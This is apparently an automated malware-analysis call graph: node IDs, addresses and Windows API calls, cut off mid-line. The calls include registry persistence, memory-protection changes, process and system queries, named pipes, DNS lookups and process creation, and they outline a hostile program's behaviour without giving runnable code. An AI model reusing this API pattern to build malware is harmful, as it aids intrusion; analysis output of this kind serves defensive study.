4db244a 15287->15289 15290 4da51dc 15287->15290 15289->15255 15291 4da5221 15290->15291 15292 4db6be4 4 API calls 15291->15292 15293 4da53b1 15291->15293 15292->15293 15293->15289 15296 4da9bb4 15294->15296 15295 4da9d51 15295->15267 15296->15295 15297 4db076c 7 API calls 15296->15297 15298 4da9ca2 15297->15298 15298->15295 15300 4da9d84 15298->15300 15302 4da9dbf 15300->15302 15301 4da9ea6 15301->15295 15302->15301 15303 4da8690 5 API calls 15302->15303 15303->15301 15305 4da831b 15304->15305 15306 4da8323 15304->15306 15305->15277 15306->15305 15307 4dc10cc 2 API calls 15306->15307 15307->15305 15610 4db716c 15611 4dbb520 5 API calls 15610->15611 15612 4db71ae 15611->15612 15446 4dc55e4 15447 4dc55fc 15446->15447 15448 4dc561e 15446->15448 15449 4db2f0c 18 API calls 15447->15449 15450 4dc5c97 15448->15450 15451 4dcf704 4 API calls 15448->15451 15449->15448 15451->15450 14819 4da68e0 14820 4da6905 14819->14820 14822 4da6a22 14819->14822 14821 4dbaf6c GetTempFileNameA 14820->14821 14831 4da690f 14821->14831 14823 4da69d7 14824 4da6a07 DeleteFileA 14823->14824 14833 4dce7a0 14823->14833 14824->14822 14829 4dacd9c 5 API calls 14830 4da6a05 14829->14830 14830->14824 14831->14822 14831->14823 14832 4db603c 3 API calls 14831->14832 14832->14831 14834 4dce7b3 14833->14834 14835 4dc2b88 3 API calls 14834->14835 14836 4da69e4 14834->14836 14835->14836 14836->14824 14837 4dbe534 14836->14837 14838 4dc0e88 2 API calls 14837->14838 14839 4dbe553 14838->14839 14840 4da69f5 14839->14840 14841 4daa1f4 4 API calls 14839->14841 14840->14829 14841->14840 14966 4db2ee0 14969 4dbab00 14966->14969 14968 4db2ef6 14970 4dbab2b 14969->14970 14972 4dbab3e 14970->14972 14973 4dc0a08 14970->14973 14972->14968 14974 4dc0a29 14973->14974 14975 4dc0aa0 14973->14975 14974->14975 14977 4dbea24 14974->14977 14975->14972 14978 4dbea55 14977->14978 14983 4dc7944 14978->14983 14980 4dbeb9b 14980->14975 14982 4db6be4 4 API calls 14982->14980 14984 4dc7974 14983->14984 14985 4dbea87 14984->14985 14987 4da2bc8 14984->14987 14985->14980 14985->14982 15000 4da2c14 14987->15000 14988 4db9380 RtlAllocateHeap CreateFileW ReadFile gethostbyname CallNamedPipeA 14988->15000 14989 4da36f6 14989->14984 14990 4da7944 RtlAllocateHeap 14993 4da363a 14990->14993 14991 4da3609 14991->14989 14991->14990 14992 4daae04 RtlAllocateHeap CreateFileW ReadFile gethostbyname CallNamedPipeA 14992->15000 14993->14989 14994 4db9380 5 API calls 14993->14994 14999 4da3698 14994->14999 14995 4db217c gethostbyname 14995->15000 14996 4daa564 3 API calls 14996->15000 14997 4dcf04c CallNamedPipeA 14997->15000 14998 4da2bc8 5 API calls 14998->14989 14999->14998 15000->14988 15000->14989 15000->14991 15000->14992 15000->14995 15000->14996 15000->14997 15001 4da2bc8 5 API calls 15000->15001 15002 4db27e4 CallNamedPipeA 15000->15002 15001->15000 15002->15000 15613 4dc2960 15615 4dc2992 15613->15615 15614 4dc29ef 15615->15614 15616 4dacb8c 13 API calls 15615->15616 15616->15614 15003 4dc54e3 15004 4dc54f1 15003->15004 15005 4dc554d 15003->15005 15004->15005 15008 4dcf2ac 2 API calls 15004->15008 15006 4dc5c97 15005->15006 15007 4dcf704 4 API calls 15005->15007 15007->15006 15009 4dc5538 15008->15009 15009->15005 15010 4db8560 2 API calls 15009->15010 15010->15005 15617 4dc5763 15618 4dc576c 15617->15618 15619 4dc592b 15617->15619 15618->15619 15621 4dc5b24 15618->15621 15622 4dcf704 4 API calls 15619->15622 15624 4dc5b2c 15619->15624 15620 4dc5c97 15621->15624 15625 4da5d98 2 API calls 15621->15625 15622->15624 15623 4dcf704 4 API calls 15623->15620 15624->15620 15624->15623 15625->15624 15011 4dc049c 15012 4dc04d1 15011->15012 15013 4dc0a08 9 API calls 15012->15013 15014 4dc04e4 15012->15014 15013->15014 15452 4dc579c 15453 4dc5b24 15452->15453 15454 4da5d98 2 API calls 15453->15454 15455 4dc5b2c 15453->15455 15454->15455 15456 4dc5c97 15455->15456 15457 4dcf704 4 API calls 15455->15457 15457->15456 15015 4dc5898 15016 4dc58a1 15015->15016 15017 4dc58e4 15016->15017 15018 4dcf2ac 2 API calls 15016->15018 15019 4dcf704 4 API calls 15017->15019 15021 4dc5c97 15017->15021 15020 4dc58cf 15018->15020 15019->15021 15020->15017 15022 4db8560 2 API calls 15020->15022 15022->15017 15458 4dae59c 15459 4dbaf6c GetTempFileNameA 15458->15459 15460 4dae5ba 15459->15460 15461 4db603c 3 API calls 15460->15461 15465 4dae5c2 15460->15465 15462 4dae5e6 15461->15462 15462->15465 15466 4db603c 3 API calls 15462->15466 15463 4dae6f5 15464 4dacd9c 5 API calls 15464->15463 15465->15463 15465->15464 15467 4dae60b 15466->15467 15467->15465 15468 4db603c 3 API calls 15467->15468 15469 4dae62b 15468->15469 15469->15465 15470 4db603c 3 API calls 15469->15470 15471 4dae64b 15470->15471 15471->15465 15472 4db603c 3 API calls 15471->15472 15473 4dae667 15472->15473 15473->15465 15474 4db603c 3 API calls 15473->15474 15475 4dae683 15474->15475 15475->15465 15476 4db603c 3 API calls 15475->15476 15477 4dae69f 15476->15477 15477->15465 15478 4dce7a0 3 API calls 15477->15478 15479 4dae6b1 15478->15479 15479->15465 15480 4dbe534 6 API calls 15479->15480 15480->15465 15308 4dc581b 15309 4dc582c 15308->15309 15310 4dc5827 15308->15310 15312 4dc5c97 15309->15312 15313 4dcf2ac 2 API calls 15309->15313 15316 4dc587f 15309->15316 15311 4dbd0f0 9 API calls 15310->15311 15311->15309 15314 4dc5866 15313->15314 15314->15312 15315 4db8560 2 API calls 15314->15315 15315->15316 15316->15312 15317 4dcf704 4 API calls 15316->15317 15317->15312 14691 4da8690 14692 4da86bb 14691->14692 14693 4da86c3 14691->14693 14695 4db1ac4 NtQueryInformationProcess 14692->14695 14694 4da87ca 14693->14694 14696 4db7dd8 2 API calls 14693->14696 14697 4dcfeb8 4 API calls 14693->14697 14695->14693 14696->14693 14697->14693 14698 4dcb516 14699 4dcb52c 14698->14699 14700 4dca864 5 API calls 14699->14700 14703 4dcba3e 14699->14703 14704 4dcb551 14700->14704 14701 4dcb5a5 RegOpenKeyA 14701->14704 14702 4dcb6a3 RegNotifyChangeKeyValue 14702->14704 14704->14701 14704->14702 14704->14703 14705 4dcb738 SetWaitableTimer 14704->14705 14706 4dcb894 SetWaitableTimer 14704->14706 14707 4dc98dc 11 API calls 14704->14707 14708 4dc17c8 11 API calls 14704->14708 14709 4da94f0 8 API calls 14704->14709 14710 4dcacac 15 API calls 14704->14710 14711 4dcb9d0 SetWaitableTimer 14704->14711 14712 4da1e24 10 API calls 14704->14712 14713 4dac134 31 API calls 14704->14713 14714 4da7e24 6 API calls 14704->14714 14705->14704 14706->14704 14707->14704 14708->14704 14709->14704 14710->14704 14711->14704 14712->14704 14713->14704 14714->14704 15023 4dcd690 15024 4dcd6c5 15023->15024 15028 4dcd6cf 15023->15028 15025 4dbaf6c GetTempFileNameA 15024->15025 15025->15028 15026 4dcd7df 15027 4dacd9c 5 API calls 15027->15026 15028->15026 15028->15027 15481 4daa994 15482 4daa9bc 15481->15482 15483 4daaa8c 15482->15483 15484 4db7910 17 API calls 15482->15484 15484->15483 15029 4dab088 15032 4da9f98 15029->15032 15031 4dab0c0 15034 4da9fcc 15032->15034 15035 4da9ffc 15034->15035 15036 4db1f9c 15034->15036 15035->15031 15038 4db1fc3 15036->15038 15037 4dc7944 5 API calls 15039 4db20b0 15037->15039 15038->15037 15038->15039 15039->15035 15040 4dc5a8e 15041 4dc5a9e 15040->15041 15044 4dc5aac 15040->15044 15046 4db890c 15041->15046 15043 4dc5c97 15044->15043 15045 4dcf704 4 API calls 15044->15045 15045->15043 15048 4db8932 15046->15048 15047 4db8a39 15047->15044 15048->15047 15049 4daa1f4 4 API calls 15048->15049 15049->15048 15050 4dc5688 15051 4db2f0c 18 API calls 15050->15051 15052 4dc56b8 15051->15052 15053 4dc5c97 15052->15053 15054 4dcf704 4 API calls 15052->15054 15054->15053 15485 4dc5588 15486 4dc55a3 15485->15486 15487 4db2f0c 18 API calls 15486->15487 15488 4dc55cc 15486->15488 15487->15488 15489 4dc5c97 15488->15489 15490 4dcf704 4 API calls 15488->15490 15490->15489 15324 4db0a0c 15325 4db0a37 15324->15325 15326 4db0ba8 15325->15326 15328 4dc5f7c 10 API calls 15325->15328 15330 4dacec0 15325->15330 15327 4dacec0 2 API calls 15326->15327 15327->15326 15328->15325 15332 4dacf12 15330->15332 15331 4dad000 15331->15325 15332->15331 15333 4dc10cc 2 API calls 15332->15333 15333->15331 14784 4dc2d84 14787 4da9420 14784->14787 14792 4db6f80 14787->14792 14791 4da949f RtlExitUserThread 14793 4db702d 14792->14793 14795 4db6f9e 14792->14795 14794 4dcf1d4 11 API calls 14793->14794 14796 4db7012 14794->14796 14795->14796 14799 4daa564 3 API calls 14795->14799 14797 4db708d 14796->14797 14798 4db70c0 14796->14798 14806 4da943f 14796->14806 14802 4dc1e58 7 API calls 14797->14802 14800 4dbaf6c GetTempFileNameA 14798->14800 14799->14795 14801 4db70c7 14800->14801 14801->14806 14815 4db3734 14801->14815 14802->14806 14804 4db70e5 14805 4dc1e58 7 API calls 14804->14805 14804->14806 14805->14806 14806->14791 14807 4dc6064 14806->14807 14808 4dc609f 14807->14808 14809 4db076c 7 API calls 14808->14809 14814 4dc61a4 14808->14814 14810 4dc60d5 14809->14810 14811 4dc0e88 2 API calls 14810->14811 14812 4dc60ee 14810->14812 14810->14814 14811->14812 14813 4dc676c 12 API calls 14812->14813 14812->14814 14813->14814 14814->14791 14816 4db376e 14815->14816 14817 4daa1f4 4 API calls 14816->14817 14818 4db37c7 14816->14818 14817->14818 14818->14804 15055 4dc5884 15056 4dc5893 15055->15056 15057 4dc5c97 15056->15057 15058 4dcf704 4 API calls 15056->15058 15058->15057 15626 4dc5907 15627 4dc5914 15626->15627 15630 4dc5b75 15626->15630 15628 4db32e4 2 API calls 15627->15628 15629 4dc5926 15627->15629 15628->15629 15629->15630 15632 4dcf704 4 API calls 15629->15632 15631 4dc5c97 15630->15631 15633 4dcf704 4 API calls 15630->15633 15632->15630 15633->15631 14846 4dd0580 14847 4dd05af 14846->14847 14848 4dd05ca 14847->14848 14849 4da7e24 6 API calls 14847->14849 14850 4dd05e2 14849->14850 14850->14848 14852 4dc5f7c 14850->14852 14853 4dc5fbd 14852->14853 14854 4dc5f8b 14852->14854 14853->14848 14855 4dc6fc4 10 API calls 14854->14855 14855->14853 15059 4dc56bd 15066 4dc7ef4 15059->15066 15062 4dc5b75 15064 4dc5c97 15062->15064 15065 4dcf704 4 API calls 15062->15065 15063 4dcf704 4 API calls 15063->15062 15065->15064 15067 4dc7f1b 15066->15067 15073 4dc7ff2 15066->15073 15070 4dc676c 12 API calls 15067->15070 15067->15073 15068 4dcf04c CallNamedPipeA 15069 4dc56cf 15068->15069 15069->15062 15069->15063 15071 4dc7f99 15070->15071 15072 4dbaf6c GetTempFileNameA 15071->15072 15071->15073 15074 4dc7faf 15072->15074 15073->15068 15074->15073 15075 4db3734 4 API calls 15074->15075 15076 4dc7fd0 15075->15076 15076->15073 15077 4db3734 4 API calls 15076->15077 15077->15073 15634 4dc5b3d 15635 4dc5b49 15634->15635 15637 4dc5b58 15635->15637 15642 4dc2da0 15635->15642 15638 4dc5b75 15637->15638 15639 4dcf704 4 API calls 15637->15639 15640 4dc5c97 15638->15640 15641 4dcf704 4 API calls 15638->15641 15639->15638 15641->15640 15644 4dc2dc0 15642->15644 15643 4dc2e31 15643->15637 15644->15643 15645 4dbad14 NtQuerySystemInformation 15644->15645 15647 4dc2df9 15644->15647 15645->15647 15646 4dc1e58 7 API calls 15646->15643 15647->15646 14094 4dafeb8 14109 4da37b8 14094->14109 14096 4daff87 14099 4daffba RegOpenKeyA 14096->14099 14105 4db0045 14096->14105 14108 4db009c 14096->14108 14098 4dafefe 14098->14096 14118 4db14e8 CreateFileW 14098->14118 14122 4db6be4 CreateFileW 14098->14122 14100 4db001f 14099->14100 14101 4daffe1 RegSetValueExA RegCloseKey 14099->14101 14100->14105 14136 4da6818 14100->14136 14101->14100 14128 4dbad14 14105->14128 14110 4da37f8 14109->14110 14111 4da3b9a 14110->14111 14112 4da38bc FindFirstFileW 14110->14112 14111->14098 14117 4da38d7 14112->14117 14113 4da3a86 FindFirstFileW 14113->14111 14116 4da3aa1 14113->14116 14114 4da3b5f FindNextFileW 14115 4da3b8f FindClose 14114->14115 14114->14116 14115->14111 14116->14114 14116->14115 14116->14116 14117->14113 14119 4db1530 14118->14119 14120 4db1541 14118->14120 14119->14120 14121 4db1563 ReadFile 14119->14121 14120->14098 14121->14120 14127 4db6c52 14122->14127 14123 4db6cde WriteFile 14125 4db6cff SetEndOfFile 14123->14125 14126 4db6d0c 14123->14126 14124 4db6cd0 SetFilePointer 14124->14123 14125->14126 14126->14098 14127->14123 14127->14124 14127->14126 14130 4dbad37 14128->14130 14129 4dbad6a NtQuerySystemInformation 14129->14130 14131 4db005d 14129->14131 14130->14129 14130->14131 14131->14108 14132 4dab75c 14131->14132 14135 4dab7c8 14132->14135 14133 4dab8f7 FindCloseChangeNotification 14133->14135 14134 4daba0e 14134->14108 14135->14133 14135->14134 14143 4da8690 14136->14143 14139 4da68a7 14139->14105 14141 4da686e 14141->14139 14142 4da8690 5 API calls 14141->14142 14142->14141 14144 4da86bb 14143->14144 14145 4da86c3 14143->14145 14158 4db1ac4 NtQueryInformationProcess 14144->14158 14146 4da6848 14145->14146 14152 4db7dd8 14145->14152 14160 4dcfeb8 14145->14160 14146->14139 14150 4dbbcc8 RtlAllocateHeap 14146->14150 14151 4dbbd14 14150->14151 14151->14141 14154 4db7e15 14152->14154 14153 4db7e2f 14153->14145 14154->14153 14173 4dc1458 VirtualProtect 14154->14173 14157 4db7ef6 VirtualProtect 14157->14153 14159 4db1af4 14158->14159 14159->14145 14161 4dcfef5 14160->14161 14162 4dc1458 VirtualProtect 14161->14162 14164 4dd006f 14161->14164 14163 4dcff1d 14162->14163 14163->14164 14175 4dae1d8 14163->14175 14164->14145 14166 4dcffdc VirtualProtect 14167 4dd000d 14166->14167 14171 4db1ac4 NtQueryInformationProcess 14167->14171 14168 4dcff4d 14168->14164 14168->14166 14169 4dc1458 VirtualProtect 14168->14169 14170 4dcff97 14169->14170 14170->14166 14172 4dcff9b VirtualProtect 14170->14172 14171->14164 14172->14166 14174 4db7edb 14173->14174 14174->14153 14174->14157 14176 4dae20c 14175->14176 14177 4dae2ab 14175->14177 14176->14177 14178 4dcfeb8 4 API calls 14176->14178 14177->14168 14178->14177 14323 4dcafb8 14370 4db64f8 14323->14370 14326 4dcb136 14335 4dcba3e 14326->14335 14374 4dbf0c4 14326->14374 14327 4dbf0c4 10 API calls 14328 4dcb095 14327->14328 14328->14326 14329 4dbf0c4 10 API calls 14328->14329 14331 4dcb0b5 14329->14331 14331->14326 14333 4db64f8 CreateMutexExA 14331->14333 14334 4dcb0cf 14333->14334 14334->14326 14338 4dbf0c4 10 API calls 14334->14338 14336 4dcb1f9 14344 4dcb22f 14336->14344 14409 4db71bc 14336->14409 14337 4dcb252 14380 4dbd0f0 14337->14380 14340 4dcb0e9 14338->14340 14340->14326 14342 4dbf0c4 10 API calls 14340->14342 14346 4dcb11e 14342->14346 14343 4dcb51a 14343->14335 14403 4dca864 14343->14403 14344->14335 14344->14343 14345 4dbf0c4 10 API calls 14344->14345 14347 4dcb3a1 14345->14347 14346->14326 14349 4db64f8 CreateMutexExA 14346->14349 14347->14335 14357 4dcb3f4 14347->14357 14393 4dcf04c 14347->14393 14349->14326 14354 4dcb5a5 RegOpenKeyA 14368 4dcb551 14354->14368 14355 4dcb6a3 RegNotifyChangeKeyValue 14355->14368 14356 4dcacac 15 API calls 14356->14368 14360 4dcb4dc 14357->14360 14416 4da5474 14357->14416 14358 4dcb738 SetWaitableTimer 14358->14368 14472 4db9cb0 14360->14472 14361 4dcb894 SetWaitableTimer 14361->14368 14364 4dcb9d0 SetWaitableTimer 14364->14368 14367 4da94f0 8 API calls 14367->14368 14368->14335 14368->14354 14368->14355 14368->14356 14368->14358 14368->14361 14368->14364 14368->14367 14479 4dc98dc 14368->14479 14487 4dc17c8 14368->14487 14496 4dac134 14368->14496 14515 4da7e24 14368->14515 14521 4da1e24 14368->14521 14371 4db6515 14370->14371 14372 4db652a CreateMutexExA 14371->14372 14373 4db651d 14371->14373 14372->14373 14373->14326 14373->14327 14376 4dbf0f8 14374->14376 14375 4dbf1e5 14375->14335 14375->14336 14375->14337 14375->14344 14376->14375 14379 4dbf15f 14376->14379 14527 4db076c 14376->14527 14379->14375 14534 4da94f0 14379->14534 14545 4dbaf6c 14380->14545 14385 4dbd21b 14388 4dbd261 14385->14388 14559 4db217c 14385->14559 14390 4dbd335 14388->14390 14563 4daa564 14388->14563 14390->14344 14391 4dbd212 DeleteFileA 14391->14385 14392 4dbd162 14392->14391 14394 4dcf093 14393->14394 14395 4dcb3d2 14394->14395 14396 4dcf112 CallNamedPipeA 14394->14396 14397 4dca7cc 14395->14397 14396->14395 14398 4dca7e5 14397->14398 14399 4dca864 5 API calls 14398->14399 14401 4dca855 14398->14401 14400 4dca815 14399->14400 14400->14401 14402 4dca81b RegSetValueExA 14400->14402 14401->14357 14402->14401 14404 4dca894 RegOpenKeyA 14403->14404 14405 4dca887 RegCreateKeyA 14403->14405 14406 4dca89f 14404->14406 14405->14406 14407 4dca8d5 14406->14407 14408 4db71bc 3 API calls 14406->14408 14407->14368 14408->14407 14586 4da85e8 14409->14586 14415 4db7224 14415->14344 14417 4da54bd 14416->14417 14471 4da57c4 14416->14471 14418 4da56cf 14417->14418 14419 4da54d0 14417->14419 14417->14471 14428 4da56e2 14418->14428 14418->14471 14422 4da5629 14419->14422 14423 4da54e3 14419->14423 14463 4da580a 14419->14463 14420 4da5d18 14424 4db2f0c 18 API calls 14420->14424 14421 4da5515 14448 4daa564 3 API calls 14421->14448 14452 4da5587 14421->14452 14430 4da5635 14422->14430 14422->14471 14429 4da54e9 14423->14429 14450 4da5615 14423->14450 14424->14452 14425 4da5c4d 14431 4daa564 3 API calls 14425->14431 14426 4da5c64 14645 4dcf1d4 14426->14645 14427 4da5cae 14442 4daa564 3 API calls 14427->14442 14427->14452 14436 4da56f6 14428->14436 14446 4da575f 14428->14446 14437 4da55bc 14429->14437 14438 4da54f5 14429->14438 14434 4da5641 14430->14434 14430->14463 14435 4da5c62 14431->14435 14433 4dca7cc 6 API calls 14440 4da5bb3 14433->14440 14434->14450 14451 4da5664 14434->14451 14466 4da5687 14434->14466 14435->14420 14435->14427 14435->14452 14453 4da573f 14436->14453 14454 4da5706 14436->14454 14436->14466 14437->14452 14622 4dbebd4 14437->14622 14444 4da558c 14438->14444 14445 4da5501 14438->14445 14439 4dcf04c CallNamedPipeA 14447 4da5d79 14439->14447 14440->14452 14456 4dbf0c4 10 API calls 14440->14456 14441 4dcf04c CallNamedPipeA 14441->14452 14442->14452 14443 4dcf04c CallNamedPipeA 14443->14471 14444->14452 14606 4db2f0c 14444->14606 14445->14421 14445->14435 14445->14463 14469 4da5bd4 14445->14469 14449 4daa564 3 API calls 14446->14449 14446->14452 14447->14357 14457 4da555b 14448->14457 14449->14457 14450->14441 14450->14452 14451->14452 14460 4dca7cc 6 API calls 14451->14460 14452->14439 14452->14447 14453->14452 14639 4db3650 14453->14639 14454->14452 14633 4db2e28 14454->14633 14456->14469 14457->14452 14467 4dcf04c CallNamedPipeA 14457->14467 14459 4da55ce 14459->14452 14630 4dc10cc CreateThread 14459->14630 14460->14466 14463->14433 14463->14452 14465 4da5c3a 14466->14452 14468 4dcf04c CallNamedPipeA 14466->14468 14467->14452 14468->14452 14469->14425 14469->14426 14469->14465 14470 4db217c gethostbyname 14470->14471 14471->14443 14471->14445 14471->14452 14471->14463 14471->14470 14669 4dbdc90 14472->14669 14474 4db9f35 14474->14343 14475 4dc0e88 CreateFileW ReadFile 14476 4db9cf0 14475->14476 14476->14474 14476->14475 14477 4dc676c 12 API calls 14476->14477 14478 4dcf04c CallNamedPipeA 14476->14478 14477->14476 14478->14476 14480 4dc990c 14479->14480 14481 4dc8108 10 API calls 14480->14481 14483 4dc9a92 14481->14483 14482 4dc9cf0 14482->14368 14483->14482 14484 4dc4bf8 RtlAllocateHeap 14483->14484 14485 4dc9c11 14483->14485 14484->14485 14485->14482 14486 4da1e24 10 API calls 14485->14486 14486->14482 14488 4dc17f6 14487->14488 14489 4dc1989 14488->14489 14492 4dc1800 14488->14492 14490 4da1e24 10 API calls 14489->14490 14491 4dc195e 14490->14491 14491->14368 14492->14491 14493 4dca864 5 API calls 14492->14493 14494 4dc18bc 14493->14494 14494->14491 14495 4dcf04c CallNamedPipeA 14494->14495 14495->14494 14497 4db076c 7 API calls 14496->14497 14498 4dac15b 14497->14498 14499 4db71bc 3 API calls 14498->14499 14502 4dac20a 14498->14502 14500 4dac1e4 14499->14500 14501 4dac1f3 RtlDeleteBoundaryDescriptor 14500->14501 14500->14502 14501->14502 14503 4dc98dc 11 API calls 14502->14503 14504 4dac27d 14502->14504 14503->14504 14505 4dcf04c CallNamedPipeA 14504->14505 14506 4dac2d5 14504->14506 14505->14506 14507 4dac345 14506->14507 14509 4dac448 14506->14509 14510 4dac45f 14506->14510 14508 4dc1e58 7 API calls 14507->14508 14513 4dac365 14508->14513 14509->14368 14511 4dcf04c CallNamedPipeA 14510->14511 14511->14509 14512 4da5474 30 API calls 14512->14513 14513->14509 14513->14512 14514 4dcf04c CallNamedPipeA 14513->14514 14514->14513 14516 4da7e40 14515->14516 14520 4da7f0d 14515->14520 14517 4db14e8 2 API calls 14516->14517 14516->14520 14518 4da7efb 14517->14518 14518->14520 14672 4dad19c 14518->14672 14520->14368 14522 4da1e4f 14521->14522 14682 4dc0f8c 14522->14682 14524 4da1eac 14524->14368 14525 4da1e75 14525->14524 14526 4dca7cc 6 API calls 14525->14526 14526->14524 14528 4dca864 5 API calls 14527->14528 14529 4db079e 14528->14529 14530 4db0839 14529->14530 14531 4db07a8 RegQueryValueExA 14529->14531 14530->14379 14532 4db07cf 14531->14532 14533 4db082e RegCloseKey 14531->14533 14532->14533 14533->14530 14536 4da9513 14534->14536 14535 4da9540 SetWaitableTimer 14535->14375 14536->14535 14538 4dc1e58 14536->14538 14539 4dca864 5 API calls 14538->14539 14540 4dc1e92 14539->14540 14541 4dc1ed0 14540->14541 14542 4dc1ebd 14540->14542 14543 4dc1ea5 RegSetValueExA 14540->14543 14541->14535 14544 4dc1ec3 RegCloseKey 14542->14544 14543->14544 14544->14541 14548 4dbaf89 14545->14548 14546 4dbafed 14546->14385 14549 4db603c 14546->14549 14547 4dbafd8 GetTempFileNameA 14547->14546 14548->14546 14548->14547 14550 4db6063 14549->14550 14553 4db60f2 14550->14553 14570 4dc2b88 14550->14570 14553->14385 14555 4dc0e88 14553->14555 14554 4dc2b88 3 API calls 14554->14553 14556 4dc0eac 14555->14556 14557 4dc0ec2 14556->14557 14558 4db14e8 2 API calls 14556->14558 14557->14392 14558->14557 14561 4db21ad 14559->14561 14560 4db223c 14560->14388 14561->14560 14562 4db222e gethostbyname 14561->14562 14562->14560 14564 4daa595 14563->14564 14565 4daa659 14564->14565 14568 4daa5a4 14564->14568 14566 4dc0e88 2 API calls 14565->14566 14567 4daa5b3 14566->14567 14567->14390 14568->14567 14578 4dc4bf8 14568->14578 14572 4dc2bbd 14570->14572 14571 4dc2c44 CreateProcessA 14573 4db60b8 14571->14573 14577 4dc2c8c 14571->14577 14572->14571 14573->14553 14573->14554 14574 4dc2d03 14575 4dc2d24 FindCloseChangeNotification 14574->14575 14575->14573 14576 4dc2d11 GetExitCodeProcess 14576->14575 14577->14574 14577->14575 14577->14576 14579 4dc4c31 14578->14579 14580 4dc4cb0 14579->14580 14582 4da7944 14579->14582 14580->14567 14583 4da7964 14582->14583 14584 4da798e RtlAllocateHeap 14583->14584 14585 4da79af 14583->14585 14584->14585 14585->14580 14587 4da85ff CreateFileA 14586->14587 14588 4da8679 14587->14588 14589 4da8634 14587->14589 14588->14415 14590 4dcf2ac 14588->14590 14589->14587 14589->14588 14600 4dafd84 14590->14600 14593 4db720b 14593->14415 14595 4db8560 14593->14595 14594 4dafd84 2 API calls 14594->14593 14596 4dafd84 2 API calls 14595->14596 14597 4db85a8 14596->14597 14598 4dafd84 2 API calls 14597->14598 14599 4db85db 14597->14599 14598->14599 14599->14415 14605 4dafdc7 14600->14605 14601 4dafe98 14601->14593 14601->14594 14602 4dafe16 ReadFile 14602->14605 14603 4dafe7f FindCloseChangeNotification 14603->14601 14605->14601 14605->14602 14605->14603 14607 4db2f4c 14606->14607 14608 4db3006 14606->14608 14607->14608 14612 4db2f54 14607->14612 14609 4dcf1d4 11 API calls 14608->14609 14610 4db302e 14609->14610 14611 4dcf1d4 11 API calls 14610->14611 14617 4db3004 14610->14617 14611->14617 14613 4daa564 3 API calls 14612->14613 14614 4db2fdb 14613->14614 14616 4daa564 3 API calls 14614->14616 14614->14617 14615 4db3148 14615->14452 14616->14617 14617->14615 14618 4db3132 14617->14618 14619 4db3150 14617->14619 14620 4dcf04c CallNamedPipeA 14618->14620 14649 4dc5470 14619->14649 14620->14615 14623 4dbebfd 14622->14623 14624 4da8690 5 API calls 14623->14624 14625 4dbec45 14624->14625 14626 4dbbcc8 RtlAllocateHeap 14625->14626 14628 4dbecda 14625->14628 14627 4dbec99 14626->14627 14627->14628 14629 4da8690 5 API calls 14627->14629 14628->14459 14629->14627 14631 4dc110a QueueUserAPC 14630->14631 14632 4dc111d 14630->14632 14631->14632 14632->14452 14634 4db2e56 14633->14634 14635 4db71bc 3 API calls 14634->14635 14638 4db2ebf 14634->14638 14636 4db2e7a 14635->14636 14661 4dc6fc4 14636->14661 14638->14466 14641 4db3671 14639->14641 14640 4db3704 14640->14466 14641->14640 14642 4daa564 3 API calls 14641->14642 14643 4db36ed 14642->14643 14643->14640 14644 4dc17c8 11 API calls 14643->14644 14644->14640 14646 4dcf1fd 14645->14646 14647 4dc98dc 11 API calls 14646->14647 14648 4dcf236 14646->14648 14647->14648 14648->14435 14650 4dc54bf 14649->14650 14651 4dc5c97 14650->14651 14653 4dcf704 14650->14653 14651->14615 14654 4dcf72d 14653->14654 14656 4dcf7aa 14653->14656 14654->14656 14657 4daa1f4 14654->14657 14656->14651 14658 4daa220 14657->14658 14659 4daa239 14658->14659 14660 4db6be4 4 API calls 14658->14660 14659->14656 14660->14659 14662 4dc7021 14661->14662 14664 4dc70cc 14662->14664 14665 4dc8108 14662->14665 14664->14638 14666 4dc8126 14665->14666 14668 4dc812b 14665->14668 14667 4da1e24 10 API calls 14666->14667 14667->14668 14668->14664 14670 4dca864 5 API calls 14669->14670 14671 4dbdccf 14670->14671 14671->14476 14674 4dad1ca 14672->14674 14677 4dad2b6 14672->14677 14674->14677 14678 4dcdfbc 14674->14678 14675 4dad265 14676 4dcdfbc 4 API calls 14675->14676 14675->14677 14676->14677 14677->14520 14679 4dcdfe0 14678->14679 14680 4db6be4 4 API calls 14679->14680 14681 4dce002 14680->14681 14681->14675 14683 4dca864 5 API calls 14682->14683 14684 4dc0fb9 14683->14684 14685 4dc0fca RegQueryValueExA 14684->14685 14686 4dc1064 14684->14686 14690 4dc1001 14685->14690 14687 4dc1090 14686->14687 14688 4dc1e58 7 API calls 14686->14688 14687->14525 14688->14687 14689 4dc1059 RegCloseKey 14689->14686 14690->14689 15078 4dc5ab9 15079 4dc5ac9 15078->15079 15085 4dc5b75 15078->15085 15081 4dc1e58 7 API calls 15079->15081 15083 4dc5af0 15079->15083 15080 4dc5c97 15081->15083 15082 4dcf704 4 API calls 15082->15080 15084 4dcf704 4 API calls 15083->15084 15083->15085 15084->15085 15085->15080 15085->15082 15337 4dbe03c 15338 4dbe11e 15337->15338 15339 4dbe078 15337->15339 15339->15338 15340 4dc1e58 7 API calls 15339->15340 15341 4dbe109 15340->15341 15342 4da9d84 5 API calls 15341->15342 15342->15338 15648 4dc573b 15649 4dc574a 15648->15649 15650 4dc5b75 15649->15650 15651 4dcf704 4 API calls 15649->15651 15652 4dc5c97 15650->15652 15653 4dcf704 4 API calls 15650->15653 15651->15650 15653->15652 15654 4dbf33c 15656 4dbf398 15654->15656 15655 4dbf468 15656->15655 15657 4da37b8 4 API calls 15656->15657 15657->15656 15086 4da26b0 15087 4da2767 15086->15087 15089 4da26db 15086->15089 15088 4dbf560 22 API calls 15088->15087 15089->15087 15089->15088 15497 4da5bb7 15498 4dbf0c4 10 API calls 15497->15498 15500 4da5bd4 15497->15500 15498->15500 15499 4da5c3a 15499->15499 15500->15499 15501 4da5c4d 15500->15501 15502 4da5c64 15500->15502 15503 4daa564 3 API calls 15501->15503 15504 4dcf1d4 11 API calls 15502->15504 15505 4da5c62 15503->15505 15504->15505 15506 4da5d18 15505->15506 15508 4da5cbe 15505->15508 15510 4da5cae 15505->15510 15509 4db2f0c 18 API calls 15506->15509 15507 4da5d79 15508->15507 15511 4dcf04c CallNamedPipeA 15508->15511 15509->15508 15510->15508 15512 4daa564 3 API calls 15510->15512 15511->15507 15512->15508 15664 4dc5b33 15665 4dc087c 9 API calls 15664->15665 15666 4dc5b3b 15665->15666 15667 4dcf704 4 API calls 15666->15667 15668 4dc5b75 15666->15668 15667->15668 15669 4dc5c97 15668->15669 15670 4dcf704 4 API calls 15668->15670 15670->15669 15519 4dc1ba4 15520 4dc1bed 15519->15520 15521 4dc1c63 15520->15521 15522 4db7910 17 API calls 15520->15522 15522->15521 15523 4dc59a5 15524 